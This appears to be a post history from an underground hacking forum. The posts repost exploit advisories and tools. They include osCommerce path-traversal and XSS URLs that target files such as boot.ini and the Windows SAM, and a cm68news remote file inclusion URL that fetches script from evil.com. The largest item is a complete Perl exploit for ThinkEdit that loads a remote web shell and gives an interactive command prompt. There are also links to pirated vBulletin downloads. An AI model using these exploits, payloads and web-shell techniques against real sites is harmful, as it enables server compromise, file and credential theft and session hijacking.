Don
-
Posts
22 -
Joined
-
Last visited
Posts posted by Don
-
-
++++++++++++++++++++++++++++++++++++
| Discovered by Breaker_unit & Don |
| Ourspace 2.0.9|
script info: [url]http://www.codedworld.com/download/our-space/26931.html[/url]
Exploit: /cgi-bin/ourspace/newswire/uploadmedia.cgi
dork: inurl:"/cgi-bin/ourspace/
Greetz to:
Balcan Crew Members
and my friends: str0ke & kw3rLn
+++++++++++++++++++++++++++++++++++++++
# milw0rm.com [2007-08-30] -
Thx for posting it
-
Very nice!
Thx for these, but, just curious, who founded the exploit ?
-
Version(s): 3.0a3
Description: Lostmon reported a vulnerability in osCommerce. A remote user can view files on the target system. A remote user can also conduct cross-site scripting attacks.
The 'admin/templates_boxes_layout.php' does not properly validate user-supplied input in the 'filter' parameter. A remote user can supply a specially crafted request to view files on target system.
Some demonstration exploit URLs are provided:
[url]http://[target]/admin/templates_boxes_layout.php?se[/url] t=boxes&filter=../../our_evil_php_file&lID=27
[url]http://[target]/admin/templates_boxes_layout.php?set=boxes&filter=../../../../file.extension%00[/url]
A remote user can also create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the osCommerce software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Some demonstration exploit URLs are provided:
[url]http://[target]/oscommerce/admin/modules.php?set=shipping[/url]
%22%3E%3Cscr ipt%3Ealert('xss')%3C/script%3E
[url]http://[target]/definitiva/admin/customers.php?selected_box=customers[/url]
%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT %3E
[url]http://[target]/oscommerce/admin/languages_definitions.php?lID=1[/url]
%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E
[url]http://[target]/oscommerce[/url] /admin/products.php?pID=1%22%3E%3CSCRIPT
%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E&action=new_product
The original advisory is available at:
[url]http://lostmon.blogspot.com/2006/12/oscommerce-traversal-arbitrary-file.html[/url]
Impact: A remote user can view files on the target system.
A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the osCommerce software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution: No solution was available at the time of this entry.
Vendor URL: [url]http://www.oscommerce.com/[/url] (Links to External Site)
Cause: Input validation error
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
Reported By: Lostmon <lostmon@gmail.com>
Message History: None.
Source Message Contents
Date: Thu, 7 Dec 2006 10:31:42 +0100
From: Lostmon <lostmon@gmail.com>
Subject: Oscommerce 3.0a3 traversal arbitrary file access
############################################
Oscommerce traversal arbitrary file access
Vendor:[url]http://www.oscommerce.com/about/news,125[/url]
Advisore:[url]http://lostmon.blogspot.com/2006/12[/url]
/oscommerce-traversal-arbitrary-file.html
Vendor notify:NO Exploit available: YES
###########################################
osCommerce contains a flaw that allows a remote traversal
arbitrary file access.This flaw exists because the application
does not validate filter variable upon submission to
admin/templates_boxes_layout.php script.This could allow a
remote authenticated administrator to create a specially
crafted URL that would execute '../' directory traversal
characters to view files on the target system with
the privileges of the target web service.
####################
versions
####################
Oscommerce 3.0a3
###################
SOLUTION
###################
No solution was available at this time.
################
timeline
################
Discovered:11-11-2006
vendor notify:-----
vendor response:----
disclosure:07-12-2006
#################
Examples
#################
######################
traversal file access
######################
wen we try to open
[url]http://localhost/oscommerce/admin/templates_boxes_layout.php?[/url]
set=boxes&filter=[SOME WORD]&lID=27
the aplication returns a full path disclosure and
returns this error:
Warning: require(includes/templates/[SOME WORD].php) [function.require]:
failed to open stream: No such file or directory in C:AppServwww
oscommerceadmintemplatespagestemplates_boxes_layout.php on line 13
Fatal error: require() [function.require]: Failed opening required
'includes/templates/[SOME WORD].php' (include_path='.;C:php5pear')
in C:AppServwwwoscommerceadmintemplatespagestemplates_
boxes_layout.php on line 13
the aplication add the .php extension to our [SOME WORD] ummm
and it searh for the file in a folder inside webserver
we can include any php file located on the web server
in the aplication and it is executed(local file inclusion)
[url]http://[victim]/admin/templates_boxes_layout.php?[/url]
set=boxes&filter=../../our_evil_php_file&lID=27
if we try to read a file outside webserver folder with a non php
extension can try for test this...
&filter=../../../../file.extension%00 for look for example boot.ini
in a windows system
[url]http://localhost/oscommerce/admin/templates_boxes_layout.php?[/url]
set=boxes&filter=../../../../BOOT.INI%00&lID=27
[url]http://localhost/oscommerce/admin/templates_boxes_layout.php?[/url]
set=content&filter=../../../../windows/repair/sam%00&lID=27
#####################
Cross site scripting
#####################
[url]http://localhost/oscommerce/admin/modules.php?set=shipping[/url]
%22%3E%3Cscript%3Ealert('xss')%3C/script%3E
[url]http://localhost/definitiva/admin/customers.php?selected_box=customers[/url]
%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E
[url]http://localhost/oscommerce/admin/languages_definitions.php?lID=1[/url]
%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E
[url]http://localhost/oscommerce/admin/products.php?pID=1%22%3E%3CSCRIPT[/url]
%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E&action=new_product
######################## €nd #####################
Thnx to Estrella to be my ligth.
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: [url]http://lostmon.blogspot.com/[/url]
--
La curiosidad es lo que hace mover la mente.. -
M8, i`m realy sorry, but i dont understand what are you writing.
Can you please tell me that on English
-
Vulnerable Software:cm68news
Vulnerable file: /engine/oldnews.inc.php
Credits: Paul Bakoyiannis
Vulnerable Variable: addpath
Example Exploit: [url]http://site.com/cm68news/engine/oldnews.inc.php?addpath=http://evil.com/script.txt?&[/url] -
#################################################################################################
# r0ut3r Presents... #
# #
# Another r0ut3r discovery! #
# writ3r [at] gmail.com #
# #
# ThinkEdit Remote File Inclusion Exploit #
#################################################################################################
# Software: ThinkEdit 1.9.2 #
# #
# Vendor: [url]http://www.thinkedit.org/[/url] #
# #
# Released: 2006/12/08 #
# #
# Discovered & Exploit By: r0ut3r (writ3r [at] gmail.com) #
# #
# Note: The information provided in this document is for ThinkEdit administrator #
# testing purposes only! #
# #
# Solution: #
# Add the below code to the top of render.php #
# if(basename(__FILE__) == basename($_SERVER['PHP_SELF'])) #
# die(); #
# #
# Exploit: #
# perl think.pl [url]http://localhost[/url] /think/ [url]http://localhost/cmd.txt[/url] cmd #
# #
# design/thinkedit/render.php?template_file= #
#################################################################################################
############################################################################
# Remote File Inclusion Exploiter #
# #
# This script attempts to exploit a remote file include vulnerability #
# by inserting a web shell into an include statement. A shell is then #
# spawned. #
# #
# Created By r0ut3r (writ3r [at] gmail.com) #
############################################################################
use IO::Socket;
$port = "80"; # connection port
$target = @ARGV[0]; # localhost
$folder = @ARGV[1]; # /think/
$shellloc = @ARGV[2]; # [url]http://localhost/cmd.txt[/url]
$cmdv = @ARGV[3]; # cmd
$vulnerable = false;
$s = true;
sub Header()
{
print q {Remote File Inclusion Exploiter - By r0ut3r (writ3r [at] gmail.com)
-------------------------------------------------------------------
};
}
sub Usage()
{
print q
{
Usage: think.pl [target] [directory] [shell_loc] [cmd_variable]
perl think.pl [url]http://localhost[/url] /think/ [url]http://localhost/cmd.txt[/url] cmd
};
exit();
}
Header();
if (!$target || !$folder || !$shellloc || !$cmdv) {
Usage(); }
if ($s eq false) { print "[-] Shell not foundn"; exit(); }
# Check if the script is vulnerable and register_globals are on (if needed)
$vulnc = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect on exploit attempt. Exiting...rn";
print $vulnc "GET ".$folder."render.php?template_file=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1n";
print $vulnc "Host: $targetn";
print $vulnc "User-Agent: Googlebot/2.1 (+[url]http://www.google.com/bot.html[/url])n";
print $vulnc "Accept: text/htmln";
print $vulnc "Connection: keep-alivenn";
while (<$vulnc>) {
if (/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/) { $vulnerable = true; }
}
if ($vulnerable eq false) { print "[-] Target not vulnerable, or register_globals could be offn"; exit(); }
print "[+] Starting shelln";
print "[cmd]$ ";
$cmd = <STDIN>;
$cmd =~ s/ /%20/g;
while ($cmd !~ "exit")
{
$xpack = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect on exploit attempt. Exiting...rn";
print $xpack "GET ".$folder."render.php?template_file=".$shellloc."&".$cmdv."=".substr($cmd, 0, -1)." HTTP/1.1n";
print $xpack "Host: $targetn";
print $xpack "User-Agent: Googlebot/2.1 (+[url]http://www.google.com/bot.html[/url])n";
print $xpack "Accept: text/htmln";
print $xpack "Connection: keep-alivenn";
print "[cmd]$ ";
$cmd = <STDIN>;
}
print "[!] Connection to host lost...n"; -
Deleted by uploader
-
file deleted
-
File deleted
-
File deleted
-
backup links
http://rapidshare.de/files/28518171/vBulletin_v3.6.0_Gold.rar
or
http://rapidshare.de/files/28518034/vBulletin_v3.6.0_Gold.rar
-
g00nshell v1.3 Final
in Programe hacking
Posted
u r a n00b
btw, why the 1st part isnt crypted too ?